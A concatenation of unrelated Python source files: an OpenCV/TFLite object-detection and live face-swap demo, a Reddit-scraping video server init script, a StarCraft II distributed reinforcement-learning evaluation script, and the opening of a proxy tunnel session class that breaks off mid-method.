self._interpreter.set_tensor(self._input_details[0]['index'], input_data)
self._interpreter.invoke()
# Retrieve detection results
boxes = self._interpreter.get_tensor(self._output_details[0]['index'])[
0] # Bounding box coordinates of detected objects
classes = self._interpreter.get_tensor(self._output_details[1]['index'])[
0] # Class index of detected objects
scores = self._interpreter.get_tensor(self._output_details[2]['index'])[
0] # Confidence of detected objects
# num = self._interpreter.get_tensor(self._output_details[3]['index'])[0] # Total number of detected objects (inaccurate and not needed)
coords = []
# Loop over all detections and draw detection box if confidence is above minimum threshold
for i in range(len(scores)):
if ((scores[i] > self._min_conf_threshold) and (scores[i] <= 1.0)):
object_name = self._labels[int(classes[i])]
if (len(detect) > 0):
if object_name not in detect:
continue
if (len(no_detect) > 0):
if object_name in no_detect:
continue
# Get bounding box coordinates and draw box
# Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()
ymin = int(max(1, (boxes[i][0] * self._imH)))
xmin = int(max(1, (boxes[i][1] * self._imW)))
ymax = int(min(self._imH, (boxes[i][2] * self._imH)))
xmax = int(min(self._imW, (boxes[i][3] * self._imW)))
if (i + 1) * 40 > 255:
color_variation += 1
cv2.rectangle(frame, (xmin, ymin), (xmax, ymax),
(10, (40 + (40 * i)) % 255, (color_variation * 40) % 255), 2)
# Save coordinates of detected person
coords.append([[xmin, ymin], [xmax, ymax]])
if len(coords) >= 1:
if object_name == "person":
result = self._distance_calculation(coords, debug=debug)
else:
result = self._distance_calculation(coords, debug=debug)
if (debug):
print(result)
if result is None:
raise Exception("Distance calculation results in None.")
elif result[0] == 3:
pass
elif result[0] == 0:
self._draw(frame, coords, i, result[1], result[2], result[3])
elif result[0] == 1:
self._draw(frame, coords, i, result[2], result[1], result[3])
elif result[0] == 2:
pass
else:
raise Exception("Invalid distance calculation result.")
else:
# ...
b = 3
# Draw label
label = '%s: %d%%' % (object_name, int(scores[i] * 100)) # Example: 'person: 72%'
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size
label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window
cv2.rectangle(frame, (xmin, label_ymin - labelSize[1] - 10),
(xmin + labelSize[0], label_ymin + baseLine - 10), (255, 255, 255),
cv2.FILLED) # Draw white box to put label text in
cv2.putText(frame, label, (xmin, label_ymin - 7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0),
2) # Draw label text
# Draw framerate in corner of frame
cv2.putText(frame, 'FPS: {0:.2f}'.format(self._frame_rate_calc), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1,
(255, 255, 0), 2, cv2.LINE_AA)
# All the results have been drawn on the frame, so it's time to display it.
cv2.imshow('Object detector', frame)
# Calculate framerate
t2 = cv2.getTickCount()
time1 = (t2 - t1) / self._freq
self._frame_rate_calc = 1 / time1
if (autosave):
video_out.write(frame)
# Press 'q' to quit
if cv2.waitKey(1) == ord('q'):
break
elif cv2.waitKey(1) == ord('w'):
self._videostream.pause_stream()
elif cv2.waitKey(1) == ord('s'):
self._videostream.continue_stream()
if (autosave):
video_out.release()
self._videostream.stop_stream()
cv2.destroyAllWindows()
def __del__(self):
"""
Destructor.
"""
# Clean up
self._videostream.stop_stream()
cv2.destroyAllWindows()
class LiveFaceSwap():
"""
Class for live detection connected to a convolutional net
"""
def __init__(self,
resolution: str = '1280x720',
debug: bool = False
):
"""
Live object detection and distance calculation.
:param model_name: Name of the directory for the detection model
:param graph_name: Name of the used detection model file
:param labelmap_name: Name of the used labelmap file
:param min_conf_threshold: minimum confidence value for detected objects to be acknowledged
:param use_tpu: specifier if a TPU is to be used
:param distance_threshold: minimum distance value between objects
:param resolution: desired video resolution (<width>x<height>)
"""
resW, resH = resolution.split('x')
self._imW, self._imH = int(resW), int(resH)
# Initialize frame rate calculation
self._frame_rate_calc = 1
self._freq = cv2.getTickFrequency()
# Initialize video stream
self._videostream = VideoStream(resolution=(self._imW, self._imH), framerate=30).start()
time.sleep(1)
def detect(self,
cascPath: str = "haarcascade_frontalface_default.xml",
autosave: bool = False,
video_title: str = "",
debug: bool = False
):
"""
Object detection via a live camera feed and distance calculations of the objects.
"""
if (autosave):
if (debug):
print("==== AUTOSAVE ON ====")
fourcc = cv2.VideoWriter_fourcc(*'XVID')
video_out = cv2.VideoWriter(video_title + ".avi", fourcc, 20.0, (640, 480))
color_variation = 0
faceCascade = cv2.CascadeClassifier(cascPath)
while True:
# read and convert image
image = self._videostream.read()
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# detect faces in the image
faces = faceCascade.detectMultiScale(
gray,
scaleFactor=1.1,
minNeighbors=5,
minSize=(30, 30),
# flags = cv2.cv.CV_HAAR_SCALE_IMAGE
)
#print("Found {0} faces!".format(len(faces)))
# show face detections
i = 0
for (x, y, w, h) in faces:
if (i + 1) * 40 > 255:
color_variation += 1
cv2.rectangle(image, (x, y), (x+w, y+h), (10, (40 + (40 * i)) % 255, (color_variation * 40) % 255), 2)
i += 1
cv2.imshow("Face detector", image)
if (autosave):
video_out.write(image)
# Press 'q' to quit
if cv2.waitKey(1) == ord('q'):
break
elif cv2.waitKey(1) == ord('w'):
self._videostream.pause_stream()
elif cv2.waitKey(1) == ord('s'):
self._videostream.continue_stream()
if (autosave):
video_out.release()
self._videostream.stop_stream()
cv2.destroyAllWindows()
def face_swap(self, swap_img="barack_obama.jpeg"):#frame=None, newface=None):
"""
Live face swapping
:param swap_img: The source of the image to swap face with
"""
landmarks_points = None
landmarks_points2 = None
def extract_index_nparray(nparray):
index = None
for num in nparray[0]:
index = num
break
return index
img = cv2.imread("./swap_faces/"+swap_img)
img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
mask = np.zeros_like(img_gray)
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor("shape_predictor_68_face_landmarks.dat")
indexes_triangles = []
# Face 1
faces = detector(img_gray)
for face in faces:
landmarks = predictor(img_gray, face)
landmarks_points = []
for n in range(0, 68):
x = landmarks.part(n).x
y = landmarks.part(n).y
landmarks_points.append((x, y))
# cv2.circle(img, (x, y), 3, (0, 0, 255), -1)
points = np.array(landmarks_points, np.int32)
convexhull = cv2.convexHull(points)
# cv2.polylines(img, [convexhull], True, (255, 0, 0), 3)
cv2.fillConvexPoly(mask, convexhull, 255)
face_image_1 = cv2.bitwise_and(img, img, mask=mask)
# Delaunay triangulation
rect = cv2.boundingRect(convexhull)
subdiv = cv2.Subdiv2D(rect)
subdiv.insert(landmarks_points)
triangles = subdiv.getTriangleList()
triangles = np.array(triangles, dtype=np.int32)
indexes_triangles = []
for t in triangles:
pt1 = (t[0], t[1])
pt2 = (t[2], t[3])
pt3 = (t[4], t[5])
index_pt1 = np.where((points == pt1).all(axis=1))
index_pt1 = extract_index_nparray(index_pt1)
index_pt2 = np.where((points == pt2).all(axis=1))
index_pt2 = extract_index_nparray(index_pt2)
index_pt3 = np.where((points == pt3).all(axis=1))
index_pt3 = extract_index_nparray(index_pt3)
if index_pt1 is not None and index_pt2 is not None and index_pt3 is not None:
triangle = [index_pt1, index_pt2, index_pt3]
indexes_triangles.append(triangle)
while True:
img2 = self._videostream.read()
img2_gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
img2_new_face = np.zeros_like(img2)
# Face 2
faces2 = detector(img2_gray)
for face in faces2:
landmarks = predictor(img2_gray, face)
landmarks_points2 = []
for n in range(0, 68):
x = landmarks.part(n).x
y = landmarks.part(n).y
landmarks_points2.append((x, y))
# cv2.circle(img2, (x, y), 3, (0, 255, 0), -1)
points2 = np.array(landmarks_points2, np.int32)
convexhull2 = cv2.convexHull(points2)
lines_space_mask = np.zeros_like(img_gray)
lines_space_new_face = np.zeros_like(img2)
if landmarks_points is None or landmarks_points2 is None:
continue
# Triangulation of both faces
for triangle_index in indexes_triangles:
# Triangulation of the first face
tr1_pt1 = landmarks_points[triangle_index[0]]
tr1_pt2 = landmarks_points[triangle_index[1]]
tr1_pt3 = landmarks_points[triangle_index[2]]
triangle1 = np.array([tr1_pt1, tr1_pt2, tr1_pt3], np.int32)
rect1 = cv2.boundingRect(triangle1)
(x, y, w, h) = rect1
cropped_triangle = img[y: y + h, x: x + w]
cropped_tr1_mask = np.zeros((h, w), np.uint8)
points = np.array([[tr1_pt1[0] - x, tr1_pt1[1] - y],
[tr1_pt2[0] - x, tr1_pt2[1] - y],
[tr1_pt3[0] - x, tr1_pt3[1] - y]], np.int32)
cv2.fillConvexPoly(cropped_tr1_mask, points, 255)
# Triangulation of second face
tr2_pt1 = landmarks_points2[triangle_index[0]]
tr2_pt2 = landmarks_points2[triangle_index[1]]
tr2_pt3 = landmarks_points2[triangle_index[2]]
triangle2 = np.array([tr2_pt1, tr2_pt2, tr2_pt3], np.int32)
rect2 = cv2.boundingRect(triangle2)
(x, y, w, h) = rect2
cropped_tr2_mask = np.zeros((h, w), np.uint8)
points2 = np.array([[tr2_pt1[0] - x, tr2_pt1[1] - y],
[tr2_pt2[0] - x, tr2_pt2[1] - y],
[tr2_pt3[0] - x, tr2_pt3[1] - y]], np.int32)
cv2.fillConvexPoly(cropped_tr2_mask, points2, 255)
# Warp triangles
points = np.float32(points)
points2 = np.float32(points2)
M = cv2.getAffineTransform(points, points2)
warped_triangle = cv2.warpAffine(cropped_triangle, M, (w, h))
warped_triangle = cv2.bitwise_and(warped_triangle, warped_triangle, mask=cropped_tr2_mask)
# Reconstructing destination face
img2_new_face_rect_area = img2_new_face[y: y + h, x: x + w]
img2_new_face_rect_area_gray = cv2.cvtColor(img2_new_face_rect_area, cv2.COLOR_BGR2GRAY)
_, mask_triangles_designed = cv2.threshold(img2_new_face_rect_area_gray, 1, 255, cv2.THRESH_BINARY_INV)
warped_triangle = cv2.bitwise_and(warped_triangle, warped_triangle, mask=mask_triangles_designed)
img2_new_face_rect_area = cv2.add(img2_new_face_rect_area, warped_triangle)
img2_new_face[y: y + h, x: x + w] = img2_new_face_rect_area
# Face swapped (putting 1st face into 2nd face)
img2_face_mask = np.zeros_like(img2_gray)
img2_head_mask = cv2.fillConvexPoly(img2_face_mask, convexhull2, 255)
img2_face_mask = cv2.bitwise_not(img2_head_mask)
img2_head_noface = cv2.bitwise_and(img2, img2, mask=img2_face_mask)
result = cv2.add(img2_head_noface, img2_new_face)
(x, y, w, h) = cv2.boundingRect(convexhull2)
center_face2 = (int((x + x + w) / 2), int((y + y + h) / 2))
seamlessclone = cv2.seamlessClone(result, img2, img2_head_mask, center_face2, cv2.MIXED_CLONE)
cv2.imshow("img2", img2)
cv2.imshow("clone", seamlessclone)
cv2.imshow("result", result)
key = cv2.waitKey(1)
if key == ord('q'):
break
self._videostream.stop_stream()
cv2.destroyAllWindows()
class VideoDetection(Detection):
"""
Class for video object detection
"""
def __init__(self,
model_name: str = 'Sample_Model',
graph_name: str = 'detect.tflite',
labelmap_name: str = 'labelmap.txt',
min_conf_threshold: int = 0.5,
use_tpu: str = '',
distance_threshold: int = 150,
debug: bool = False
):
"""
Video object detection and distance calculation.
:param model_name: Name of the directory for the detection model
:param graph_name: Name of the used detection model file
:param labelmap_name: Name of the used labelmap file
:param min_conf_threshold: minimum confidence value for detected objects to be acknowledged
:param use_tpu: specifier if a TPU is to be used
:param distance_threshold: minimum distance value between objects
"""
super(VideoDetection, self).__init__(model_name, graph_name, labelmap_name, min_conf_threshold, use_tpu,
distance_threshold)
self._video = None
self.stop = False
def detect(self,
video_name: str = "Sample_Video/testvideo1.mp4",
focal_width: int = 1000,
debug: bool = False
):
"""
Object detection via a video feed and distance calculations of the objects.
:param video_name: path to the video that should be used for detection
:param focal_width: focal width of the used camera in the video
"""
self.focal_value = focal_width
# Path to video file
video_path = os.path.join(self._cwd_path, video_name)
color_variation = 0
# Open video file
self._video = cv2.VideoCapture(video_path)
imW = self._video.get(cv2.CAP_PROP_FRAME_WIDTH)
imH = self._video.get(cv2.CAP_PROP_FRAME_HEIGHT)
while (self._video.isOpened()):
# Acquire frame and resize to expected shape [1xHxWx3]
ret, frame = self._video.read()
if not ret:
print('Reached the end of the video!')
break
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (self._width, self._height))
input_data = np.expand_dims(frame_resized, axis=0)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if self._floating_model:
input_data = (np.float32(input_data) - self.input_mean) / self.input_std
# Perform the actual detection by running the model with the image as input
self._interpreter.set_tensor(self._input_details[0]['index'], input_data)
self._interpreter.invoke()
# Retrieve detection results
boxes = self._interpreter.get_tensor(self._output_details[0]['index'])[
0] # Bounding box coordinates of detected objects
classes = self._interpreter.get_tensor(self._output_details[1]['index'])[
0] # Class index of detected objects
scores = self._interpreter.get_tensor(self._output_details[2]['index'])[0] # Confidence of detected objects
# num = interpreter.get_tensor(self.output_details[3]['index'])[0] # Total number of detected objects (inaccurate and not needed)
coords = []
# Loop over all detections and draw detection box if confidence is above minimum threshold
for i in range(len(scores)):
if ((scores[i] > self._min_conf_threshold) and (scores[i] <= 1.0)):
object_name = self._labels[int(classes[i])]
if (object_name != "person" and object_name != "teddy bear" and object_name != "chair"):
continue
# Get bounding box coordinates and draw box
# Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()
ymin = int(max(1, (boxes[i][0] * imH)))
xmin = int(max(1, (boxes[i][1] * imW)))
ymax = int(min(imH, (boxes[i][2] * imH)))
xmax = int(min(imW, (boxes[i][3] * imW)))
if (i + 1) * 40 > 255:
color_variation += 1
cv2.rectangle(frame, (xmin, ymin), (xmax, ymax),
(10, (40 + (40 * i)) % 255, (color_variation * 40) % 255), 2)
# Save coordinates of detected person
coords.append([[xmin, ymin], [xmax, ymax]])
if (len(coords) > 1):
if object_name == "person":
result = self._distance_calculation(coords, debug=debug)
else:
result = self._distance_calculation(coords, debug=debug)
if (debug):
print(result)
if result[0] == 3:
pass
elif result[0] == 0:
self._draw(frame, coords, result[1], result[2], result[3], result[4])
elif result[0] == 1:
self._draw(frame, coords, result[1], result[2], result[3], result[4])
elif result[0] == 2:
pass
else:
raise Exception("Invalid distance calculation result.")
else:
# ...
b = 3
# Draw label
label = '%s: %d%%' % (object_name, int(scores[i] * 100)) # Example: 'person: 72%'
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size
label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window
cv2.rectangle(frame, (xmin, label_ymin - labelSize[1] - 10),
(xmin + labelSize[0], label_ymin + baseLine - 10), (255, 255, 255),
cv2.FILLED) # Draw white box to put label text in
cv2.putText(frame, label, (xmin, label_ymin - 7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0),
2) # Draw label text
# All the results have been drawn on the frame, so it's time to display it.
cv2.imshow('Object detector', frame)
# Press 'q' to quit
if cv2.waitKey(1) == ord('q'):
break
def __del__(self):
"""
Destructor.
"""
# Clean up
if self._video is not None:
self._video.release()
cv2.destroyAllWindows()
|
initserver.py
|
import settings
settings.generateConfigFile()
import reddit
import socketserverhandler
import socketservervideogenerator
from time import sleep
import database
import datetime
from threading import Thread
import atexit
def getScripts():
global lastUpdate
print("Grabbing more scripts...")
info = reddit.getInfo('AskReddit', settings.reddit_amount_posts)
new_scripts = len([script for script in info if not script.update])
updating_scripts = len([script for script in info if script.update])
print("Adding %s new scripts, updating %s" % (new_scripts, updating_scripts))
for script in info:
if script.update:
database.updateSubmission(script)
else:
database.addSubmission(script)
lastUpdate = datetime.datetime.now()
lastUpdate = None
def updateScripts():
while True:
sleep(10)
if lastUpdate is None:
getScripts()
now = datetime.datetime.now()
if not lastUpdate.hour == now.hour:
print("Getting more scripts - last update at %s" % lastUpdate)
getScripts()
def init():
socketserverhandler.startServer()
socketservervideogenerator.startVideoGeneratorServer()
thread = Thread(target=updateScripts)
thread.start()
#youtubequeue.initQueue()
#socketclient.connectToServer()
#print(checkValueExists("scriptid", "t5_2qh1i"))
#updateScriptStatus("EDITING", "t5_2qh1i")
#print(getVideoCountFromStatus("RAW"))
#print(getRowCount("scripts"))x
def exit_handler():
print("Safe Exit")
socketserverhandler.socket.close()
socketservervideogenerator.socket.close()
if __name__ == "__main__":
atexit.register(exit_handler)
init()
|
clone_one_eval_mini_srcgame_add_map_bn.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
USED_DEVICES = "4,5"
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = USED_DEVICES
import sys
import threading
import time
import tensorflow as tf
from absl import app
from absl import flags
from pysc2 import maps
from pysc2.lib import stopwatch
import lib.config as C
import param as P
import mini_source_agent_add_map_bn as mini_source_agent
from mini_network_add_map_bn import MiniNetwork
# from pysc2.env import sc2_env
from lib import my_sc2_env as sc2_env
from lib.replay_buffer import Buffer
from strategy.terran_agent import DummyTerran
from strategy_env import SimulatePlatform
import unit.protoss_unit as P
import unit.terran_unit as T
from datetime import datetime
import multiprocessing as mp
import numpy as np
from logging import warning as logging
FLAGS = flags.FLAGS
flags.DEFINE_bool("training", True, "Whether to train agents.")
flags.DEFINE_bool("on_server", True, "Whether is running on server.")
flags.DEFINE_bool("debug_mode", True, "Whether is debuging")
flags.DEFINE_integer("num_for_update", 100, "Number of episodes for each train.")
flags.DEFINE_string("log_path", "./logs/", "Path for log.")
flags.DEFINE_string("device", USED_DEVICES, "Device for training.")
# Simple64
flags.DEFINE_string("map", "Simple64", "Name of a map to use.")
flags.DEFINE_bool("render", False, "Whether to render with pygame.")
flags.DEFINE_integer("screen_resolution", 64, "Resolution for screen feature layers.")
flags.DEFINE_integer("minimap_resolution", 64, "Resolution for minimap feature layers.")
flags.DEFINE_enum("agent_race", "P", sc2_env.races.keys(), "Agent's race.")
flags.DEFINE_enum("bot_race", "T", sc2_env.races.keys(), "Bot's race.")
flags.DEFINE_enum("difficulty", "7", sc2_env.difficulties.keys(), "Bot's strength.")
flags.DEFINE_integer("max_agent_steps", 18000, "Total agent steps.")
flags.DEFINE_integer("step_mul", 8, "Game steps per agent step.")
flags.DEFINE_bool("profile", False, "Whether to turn on code profiling.")
flags.DEFINE_bool("trace", False, "Whether to trace the code execution.")
flags.DEFINE_bool("save_replay", False, "Whether to replays_save a replay at the end.")
flags.DEFINE_string("replay_dir", "multi-agent/", "dir of replay to replays_save.")
# 20200825-101942_mini
# 20200828-160609_source
flags.DEFINE_string("restore_model_path", "./model/20200901-213813_mini/", "path for restore model")
flags.DEFINE_bool("restore_model", True, "Whether to restore old model")
flags.DEFINE_string("restore_from", "mini", "mini (for Thought-Game) or source (for Real game)")
flags.DEFINE_string("restore_to", "source", "mini (for Thought-Game) or source (for Real game)")
flags.DEFINE_bool("load_latest", False, "Load latest or bestest model, default is False")
flags.DEFINE_integer("parallel", 10, "How many processes to run in parallel.")
flags.DEFINE_integer("thread_num", 5, "How many thread to run in the process.")
flags.DEFINE_integer("port_num", 8770, "the start port to create distribute tf")
flags.DEFINE_integer("max_iters", 100, "the rl agent max run iters")
flags.DEFINE_string("game_version", None, "game version of SC2")
flags.DEFINE_bool("freeze_head", True, "Whether freeze_head train agents.")
flags.DEFINE_bool("use_bn", False, "Whether use batch_norm to training.")
flags.DEFINE_bool("use_sep_net", False, "Whether use seperate network for policy and value model.")
flags.DEFINE_integer("ob_space_add", 4, "Add state space from thought game.")
flags.DEFINE_integer("act_space_add", 5, "Add action space from thought game.")
flags.DEFINE_bool("add_image", False, "Whether add image for input.")
flags.DEFINE_string("weighted_sum_type", "AddWeight", "add weighted sum type, AddWeight, AdaptiveWeight, AttentionWeight")
FLAGS(sys.argv)
# set the play map
play_map = C.get_map_class('lib.config.' + FLAGS.map)
C.my_sub_pos = play_map.my_sub_pos
C.enemy_sub_pos = play_map.enemy_sub_pos
C.enemy_main_pos = play_map.enemy_main_pos
C.base_camera_pos = play_map.base_camera_pos
if not FLAGS.on_server or FLAGS.debug_mode:
PARALLEL = 1
THREAD_NUM = 1
MAX_AGENT_STEPS = 18000
DEVICE = ['/gpu:0']
NUM_FOR_UPDATE = 1
TRAIN_ITERS = 1
PORT_NUM = FLAGS.port_num
else:
PARALLEL = FLAGS.parallel
THREAD_NUM = FLAGS.thread_num
MAX_AGENT_STEPS = FLAGS.max_agent_steps
if USED_DEVICES == '-1':
DEVICE = ['/cpu:0']
else:
DEVICE = ['/gpu:' + str(dev) for dev in range(len(FLAGS.device.split(',')))]
NUM_FOR_UPDATE = FLAGS.num_for_update
TRAIN_ITERS = FLAGS.max_iters
PORT_NUM = FLAGS.port_num
LOG = FLAGS.log_path
if not os.path.exists(LOG):
os.makedirs(LOG)
SERVER_DICT = {"worker": [], "ps": []}
# define some global variable
UPDATE_EVENT, ROLLING_EVENT = threading.Event(), threading.Event()
Counter = 0
Waiting_Counter = 0
Update_Counter = 0
Result_List = []
'''
ps -ef |grep liuruoze | grep 'SC2_x64' | awk '{print $2}' | xargs kill -9
kill -9 `ps -ef |grep liuruoze | grep eval_mini_srcgame_add_map_bn | awk '{print $2}' `
'''
def run_thread(agent, game_num, Synchronizer, difficulty):
global UPDATE_EVENT, ROLLING_EVENT, Counter, Waiting_Counter, Update_Counter, Result_List
num = 0
all_num = 0
proc_name = mp.current_process().name
C._FPS = 22.4 / FLAGS.step_mul # 5.6
step_mul = FLAGS.step_mul # 4
C.difficulty = difficulty
with sc2_env.SC2Env(
map_name=FLAGS.map,
agent_race=FLAGS.agent_race,
bot_race=FLAGS.bot_race,
difficulty=difficulty,
step_mul=step_mul,
score_index=-1,
game_steps_per_episode=MAX_AGENT_STEPS,
screen_size_px=(FLAGS.screen_resolution, FLAGS.screen_resolution),
minimap_size_px=(FLAGS.minimap_resolution, FLAGS.minimap_resolution),
visualize=False,
game_version=FLAGS.game_version) as env:
# env = available_actions_printer.AvailableActionsPrinter(env)
agent.set_env(env)
while all_num != game_num * TRAIN_ITERS:
agent.play_right_add(verbose=FLAGS.debug_mode)
if FLAGS.training:
# check if the num of episodes is enough to update
num += 1
all_num += 1
reward = agent.result['reward']
Counter += 1
Result_List.append(reward)
logging("(diff: %d) %d epoch: %s get %d/%d episodes! return: %d!" %
(int(difficulty), Update_Counter, proc_name, len(Result_List), game_num * THREAD_NUM, reward))
# time for update
if num == game_num:
num = 0
ROLLING_EVENT.clear()
# worker stops rolling, wait for update
if agent.index != 0 and THREAD_NUM > 1:
Waiting_Counter += 1
if Waiting_Counter == THREAD_NUM - 1: # wait for all the workers stop
UPDATE_EVENT.set()
ROLLING_EVENT.wait()
# update!
else:
if THREAD_NUM > 1:
UPDATE_EVENT.wait()
Synchronizer.wait() # wait for other processes to update
agent.update_network(Result_List)
Result_List.clear()
agent.global_buffer.reset()
Synchronizer.wait()
Update_Counter += 1
# finish update
UPDATE_EVENT.clear()
Waiting_Counter = 0
ROLLING_EVENT.set()
if FLAGS.save_replay:
env.save_replay(FLAGS.replay_dir)
agent.reset()
def Worker(index, update_game_num, Synchronizer, cluster, model_path, log_path):
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
worker = tf.train.Server(cluster, job_name="worker", task_index=index, config=config)
sess = tf.Session(target=worker.target, config=config)
summary_writer = tf.summary.FileWriter(log_path)
Net = MiniNetwork(sess=sess, summary_writer=summary_writer, rl_training=FLAGS.training,
cluster=cluster, index=index, device=DEVICE[index % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path,
ob_space_add=FLAGS.ob_space_add, act_space_add=FLAGS.act_space_add,
freeze_head=FLAGS.freeze_head, use_bn=FLAGS.use_bn,
use_sep_net=FLAGS.use_sep_net, restore_model=FLAGS.restore_model,
restore_from=FLAGS.restore_from, restore_to=FLAGS.restore_to,
load_latest=FLAGS.load_latest, add_image=FLAGS.add_image)
global_buffer = Buffer()
agents = []
for i in range(THREAD_NUM):
agent = mini_source_agent.MiniSourceAgent(index=i, global_buffer=global_buffer, net=Net,
restore_model=FLAGS.restore_model, rl_training=FLAGS.training,
strategy_agent=None, ob_space_add=FLAGS.ob_space_add)
agents.append(agent)
print("Worker %d: waiting for cluster connection..." % index)
sess.run(tf.report_uninitialized_variables())
print("Worker %d: cluster ready!" % index)
while len(sess.run(tf.report_uninitialized_variables())):
print("Worker %d: waiting for variable initialization..." % index)
time.sleep(1)
print("Worker %d: variables initialized" % index)
game_num = np.ceil(update_game_num // THREAD_NUM)
UPDATE_EVENT.clear()
ROLLING_EVENT.set()
# Run threads
threads = []
for i in range(THREAD_NUM - 1):
t = threading.Thread(target=run_thread, args=(agents[i], game_num, Synchronizer, FLAGS.difficulty))
threads.append(t)
t.daemon = True
t.start()
time.sleep(3)
run_thread(agents[-1], game_num, Synchronizer, FLAGS.difficulty)
for t in threads:
t.join()
def Parameter_Server(Synchronizer, cluster, log_path, model_path, procs):
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
server = tf.train.Server(cluster, job_name="ps", task_index=0, config=config)
sess = tf.Session(target=server.target, config=config)
summary_writer = tf.summary.FileWriter(log_path)
Net = MiniNetwork(sess=sess, summary_writer=summary_writer, rl_training=FLAGS.training,
cluster=cluster, index=0, device=DEVICE[0 % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path,
ob_space_add=FLAGS.ob_space_add, act_space_add=FLAGS.act_space_add,
freeze_head=FLAGS.freeze_head, use_bn=FLAGS.use_bn,
use_sep_net=FLAGS.use_sep_net,
restore_model=FLAGS.restore_model,
restore_from=FLAGS.restore_from, restore_to=FLAGS.restore_to,
load_latest=FLAGS.load_latest, add_image=FLAGS.add_image)
agent = mini_source_agent.MiniSourceAgent(index=-1, net=Net, restore_model=FLAGS.restore_model,
rl_training=FLAGS.training, ob_space_add=FLAGS.ob_space_add)
print("Parameter server: waiting for cluster connection...")
sess.run(tf.report_uninitialized_variables())
print("Parameter server: cluster ready!")
print("Parameter server: initializing variables...")
agent.init_network()
print("Parameter server: variables initialized")
update_counter = 0
max_win_rate = 0.
latest_win_rate = 0.
while update_counter < TRAIN_ITERS:
agent.reset_old_network()
# wait for update
Synchronizer.wait()
logging("Update Network!")
# TODO count the time , compare cpu and gpu
time.sleep(1)
# update finish
Synchronizer.wait()
logging("Update Network finished!")
steps, win_rate = agent.update_summary(update_counter)
logging("Steps: %d, win rate: %f" % (steps, win_rate))
update_counter += 1
if win_rate >= max_win_rate:
agent.save_model()
max_win_rate = win_rate
latest_win_rate = win_rate
agent.net.save_latest_policy()
return max_win_rate, latest_win_rate
def _main(unused_argv):
# create distribute tf cluster
start_port = PORT_NUM
SERVER_DICT["ps"].append("localhost:%d" % start_port)
for i in range(PARALLEL):
SERVER_DICT["worker"].append("localhost:%d" % (start_port + 1 + i))
Cluster = tf.train.ClusterSpec(SERVER_DICT)
now = datetime.now()
model_path = "./model/" + now.strftime("%Y%m%d-%H%M%S") + "_source/"
if not os.path.exists(model_path):
os.makedirs(model_path)
log_path = "./logs/" + now.strftime("%Y%m%d-%H%M%S") + "_source/"
UPDATE_GAME_NUM = NUM_FOR_UPDATE
per_update_num = np.ceil(UPDATE_GAME_NUM / PARALLEL)
Synchronizer = mp.Barrier(PARALLEL + 1)
# Run parallel process
procs = []
for index in range(PARALLEL):
p = mp.Process(name="Worker_%d" % index, target=Worker, args=(index, per_update_num, Synchronizer, Cluster, model_path, log_path))
procs.append(p)
p.daemon = True
p.start()
time.sleep(1)
max_win_rate, latest_win_rate = Parameter_Server(Synchronizer, Cluster, log_path, model_path, procs)
print('#######################')
print('Best Win_rate:', max_win_rate)
print('Latest Win_rate:', latest_win_rate)
print('#######################')
for p in procs:
p.join()
'''
if FLAGS.profile:
print(stopwatch.sw)
'''
if __name__ == "__main__":
app.run(_main)
|
proxy_session.py
|
import time
import json
import threading
import struct
import urlparse
from xlog import getLogger
xlog = getLogger("x_tunnel")
from simple_http_client import HTTP_client
import utils
import base_container
import encrypt
import global_var as g
def encrypt_data(data):
if g.config.encrypt_data:
return encrypt.Encryptor(g.config.encrypt_password, g.config.encrypt_method).encrypt(data)
else:
return data
def decrypt_data(data):
if g.config.encrypt_data:
return encrypt.Encryptor(g.config.encrypt_password, g.config.encrypt_method).decrypt(data)
else:
return data
class ProxySession():
def __init__(self):
self.upload_task_queue = base_container.BlockSendPool(max_payload=g.config.block_max_size, send_delay=0)
self.ack_pool = base_container.AckPool()
self.mutex = threading.Lock() # lock for conn_id, sn generation, on_road_num change,
self.download_order_queue = base_container.BlockReceivePool(process_callback=self.download_data_processor)
self.running = False
self.start()
def start(self):
self.ack_pool.reset()
self.download_order_queue.reset()
self.roundtrip_thread = {}
self.session_id = utils.generate_random_lowercase(8)
self.last_conn_id = 0
self.last_transfer_no = 0
self.conn_list = {}
self.transfer_list = {}
self.last_roundtrip_time = 0
self.on_road_num = 0
self.last_download_data_time = 0
self.traffic = 0
if not self.login_session():
xlog.warn("x-tunnel session not start")
return False
self.running = True
self.upload_task_queue.start()
server_port = g.server_port
for i in range(0, g.config.concurent_thread_num):
if g.config.port_range > 1:
server_port += 1
if server_port > g.server_port + g.config.port_range:
server_port = g.server_port
server_address = (g.server_host, server_port)
self.roundtrip_thread[i] = threading.Thread(target=self.normal_roundtrip_worker, args=(server_address,))
self.roundtrip_thread[i].daemon = True
self.roundtrip_thread[i].start()
def stop(self):
if not self.running:
#xlog.warn("stop but not running")
return
self.running = False
self.session_id = ""
self.balance = 0
self.close_all_connection()
self.upload_task_queue.stop()
#xlog.debug("begin join roundtrip_thread")
for i in self.roundtrip_thread:
# xlog.debug("begin join %d", i)
rthead = self.roundtrip_thread[i]
if rthead is threading.current_thread():
